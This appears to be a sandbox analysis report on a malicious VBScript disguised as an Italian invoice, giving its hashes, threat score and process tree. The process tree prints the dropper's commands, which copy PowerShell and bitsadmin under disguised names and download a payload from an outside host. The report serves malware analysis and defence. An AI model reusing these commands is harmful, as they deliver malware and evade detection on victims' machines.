Analysis
-
max time kernel
135s -
max time network
49s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
13-07-2020 07:26
Static task
static1
Behavioral task
behavioral1
Sample
Fatt_cliente_01557430269.vbs
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Fatt_cliente_01557430269.vbs
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
Fatt_cliente_01557430269.vbs
-
Size
4KB
-
MD5
5b96f2ae8a3683b45b13cabbf3a134ee
-
SHA1
57d4d4b4a328628471949a3d434b5993ce6430ba
-
SHA256
a0291ef7ae4a775b1ac0a6cf14f58dba8ea3703c41cacc73b64f00f46d053766
-
SHA512
f724493f0a1ebdc89ce901e11e30eeb98b82186ae0e748ff2dc80939d2532c6573bdf7e98366b53f568ca8d502a093331779028fe14b5088796f859a4f83e909
Score
8/10
Malware Config
Signatures
-
Suspicious use of WriteProcessMemory 7 IoCs
Processes:
WScript.exedescription pid process target process PID 2804 wrote to memory of 996 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 996 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 1700 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 1700 2804 WScript.exe cmd.exe PID 2804 wrote to memory of 1136 2804 WScript.exe VWga.exe PID 2804 wrote to memory of 1136 2804 WScript.exe VWga.exe PID 2804 wrote to memory of 1136 2804 WScript.exe VWga.exe -
Executes dropped EXE 1 IoCs
Processes:
VWga.exepid process 1136 VWga.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_01557430269.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zVWga.exe2⤵PID:996
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\VWga.exe2⤵PID:1700
-
C:\Users\Admin\AppData\Roaming\VWga.exe"C:\Users\Admin\AppData\Roaming\VWga.exe" /transfer mTGVIF /download https://mzgotech.com/temha/01557430269/it.gif C:\Users\Admin\AppData\Roaming\it.gif2⤵
- Executes dropped EXE
PID:1136